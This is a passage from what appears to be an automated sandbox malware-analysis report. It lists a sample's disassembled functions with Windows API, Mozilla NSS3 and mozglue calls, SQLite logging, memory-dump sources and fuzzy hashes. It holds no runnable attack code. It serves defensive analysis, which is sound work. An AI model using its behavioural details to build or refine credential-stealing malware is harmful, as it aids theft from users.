                                                                                                                                                                                          • Instruction Fuzzy Hash: BB2174F5104601AEDB727B25D802A9EB7E5DF92B60B20C83AF58456163EF329C10DB9D
                                                                                                                                                                                          Function 000215E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000215BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 000215C6
                                                                                                                                                                                            • Part of subcall function 000215BC: HeapAlloc.KERNEL32(00000000), ref: 000215CD
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00021606
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0002160C
                                                                                                                                                                                          • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00021614
                                                                                                                                                                                          • GetWindowContextHelpId.USER32(00000000), ref: 0002161B
                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,00000000), ref: 00021623
                                                                                                                                                                                          • RegisterClassW.USER32(00000000), ref: 0002162A
                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00021631
                                                                                                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 00021638
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00021644
                                                                                                                                                                                          • IsDialogMessageW.USER32(00000000,00000000), ref: 0002164C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00021656
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002165D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3627164727-0
                                                                                                                                                                                          • Opcode ID: 4dccd86edead0babde2c1256cf6e7fd906450d9e04d723ca1ed3207d5db2a560
                                                                                                                                                                                          • Instruction ID: f73e579ce9db78cb76b7385455b5f6be11851ed5fea856e0ddfcafa74797d434
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dccd86edead0babde2c1256cf6e7fd906450d9e04d723ca1ed3207d5db2a560
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5014272402A24FBE7126BA1AD0DDDF3E6CEF4A363B041045F60A910618B7C5602CBFA
                                                                                                                                                                                          Function 6C554E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C554E90
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C554EA9
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C554EC6
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C554EDF
                                                                                                                                                                                          • PL_HashTableLookup.NSS3 ref: 6C554EF8
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C554F05
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C554F13
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C554F3A
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                          • String ID: bUUl$bUUl
                                                                                                                                                                                          • API String ID: 326028414-3411056490
                                                                                                                                                                                          • Opcode ID: 1356b22ca2578281938e9916613030d06d0030d3e3db21a18935185548cfc436
                                                                                                                                                                                          • Instruction ID: 85cdcd1c1da2f2215a757643a85d81a6c69d22e4570fa70b5a4973f557851959
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1356b22ca2578281938e9916613030d06d0030d3e3db21a18935185548cfc436
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E414DB4A00605DFCB00EF69C48486ABBF4FF49304B158669DC599B710EB30E865CFA5
                                                                                                                                                                                          Function 6C566C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_DigestInit), ref: 6C566C66
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C566C94
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C566CA3
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C566CB9
                                                                                                                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C566CD5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$ndl
                                                                                                                                                                                          • API String ID: 1003633598-2059001174
                                                                                                                                                                                          • Opcode ID: 7d88505b59091095326b8beb65ba870c1f04cc4776353c6aeaa86292b66e95fa
                                                                                                                                                                                          • Instruction ID: 6d9aaf98192a786efd30d4dd06c2cb0c62654f0abc5f30228c9dbd84153432d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d88505b59091095326b8beb65ba870c1f04cc4776353c6aeaa86292b66e95fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21E131A01215ABDB009F26DD89B9A37B5EB9631CF448025E50997F22DF309958CB9E
                                                                                                                                                                                          Function 6C413480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C413492
                                                                                                                                                                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C4134A9
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C4134EF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C41350E
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C413522
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C413552
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C41357C
                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C413592
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                          • API String ID: 3634367004-706389432
                                                                                                                                                                                          • Opcode ID: 34e0f47ce2ef951c31944259bd91d844f92539f41b924d3108b129d2f74fb372
                                                                                                                                                                                          • Instruction ID: af7be456bb758b818230f79c0d757f497b1da7b3711ab4de9aa92ca9c0d21e97
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e0f47ce2ef951c31944259bd91d844f92539f41b924d3108b129d2f74fb372
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0331AF71B012299BEF14EFB9C848FBA77B9FB55715F104029E645A3B50EB30AD05CB60
                                                                                                                                                                                          Function 6C57ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C57DE64), ref: 6C57ED0C
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C57ED22
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C57ED4A
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C57ED6B
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C57ED38
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: TlsGetValue.KERNEL32(?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4C97
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CB0
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CC9
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C57ED52
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C57ED83
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C57ED95
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C57ED9D
                                                                                                                                                                                            • Part of subcall function 6C5964F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C59127C,00000000,00000000,00000000), ref: 6C59650E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                          • API String ID: 3323615905-3315324353
                                                                                                                                                                                          • Opcode ID: 424669c030c673788a21e81d222a3fdc9a72ab35ca309408ac2f8770957db17d
                                                                                                                                                                                          • Instruction ID: 01926561ee991019fbb76d40bf22773f998a00d2ad970db4a7cdc306772967d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 424669c030c673788a21e81d222a3fdc9a72ab35ca309408ac2f8770957db17d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93115E36900315AFD76096669C84FFB7378AF4274CF05092DE80462E41FB61A94CC5FB
                                                                                                                                                                                          Function 6C5A4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C5A4DCB
                                                                                                                                                                                            • Part of subcall function 6C590FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5387ED,00000800,6C52EF74,00000000), ref: 6C591000
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PR_NewLock.NSS3(?,00000800,6C52EF74,00000000), ref: 6C591016
                                                                                                                                                                                            • Part of subcall function 6C590FF0: PL_InitArenaPool.NSS3(00000000,security,6C5387ED,00000008,?,00000800,6C52EF74,00000000), ref: 6C59102B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C5A4DE1
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C5A4DFF
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5A4E59
                                                                                                                                                                                            • Part of subcall function 6C58FAB0: free.MOZGLUE(?,-00000001,?,?,6C52F673,00000000,00000000), ref: 6C58FAC7
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C66300C,00000000), ref: 6C5A4EB8
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C5A4EFF
                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C5A4F56
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5A521A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                          • Opcode ID: 9d15f081dff0cf4e3227dce81db3b71bfc0723ec02b65dc358434a1e2919f8d3
                                                                                                                                                                                          • Instruction ID: 060bfce9566ed4a48607eea10f003f13b0d1ce071dcb1ff6bf7da22d93d7253c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d15f081dff0cf4e3227dce81db3b71bfc0723ec02b65dc358434a1e2919f8d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C5F19171E00205CBDB04CF96D840BADB7B2FF88358F658169D915AB781EB35E982CF91
                                                                                                                                                                                          Function 6C414480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$moz_xmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3009372454-0
                                                                                                                                                                                          • Opcode ID: 037bde49111960e0ac13b950dc139558b8f8ba9f091e90e18f96157104249253
                                                                                                                                                                                          • Instruction ID: 447e39e7c90db4e6f4d4adb80487c162f9cbc55123e15c7f401e859eb5c54d29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 037bde49111960e0ac13b950dc139558b8f8ba9f091e90e18f96157104249253
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EB1F275A081108FDB18DF2CD890F7D76A2AF463ACF18162CE4A6DBFC2D73499408B91
                                                                                                                                                                                          Function 6C47AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1192971331-0
                                                                                                                                                                                          • Opcode ID: ef0a30759c8f4ec2597c9d3eb30fedfc85d79291216fa9c9247b4da7dd68389d
                                                                                                                                                                                          • Instruction ID: 1995d08f55ce731e22b20ed955425e78f146d0d65772ddc0b1c2c2f0eccb435d
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef0a30759c8f4ec2597c9d3eb30fedfc85d79291216fa9c9247b4da7dd68389d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0317EB1A047048FDB10FF78C648AAEBBF5BF95305F01892DE88587301EB709448CB92
                                                                                                                                                                                          Function 6C4D2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D2F3D
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C4D2FB9
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C4D3005
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4D30EE
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D3131
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4D3178
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                          • Opcode ID: 2e9efc4a0f8d1959baa8e3c1afb13a5409a985d5107d5200a3c01a9098d975b1
                                                                                                                                                                                          • Instruction ID: c9dada6911196d35ed250c2ab26c295944f04996cf0a36561175dc5171aacdff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9efc4a0f8d1959baa8e3c1afb13a5409a985d5107d5200a3c01a9098d975b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CB1BDB0E052199BCB19DF9DC894EEEBBB1BF48304F15842DE805B7B45D774A842CBA4
                                                                                                                                                                                          Function 6C522D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
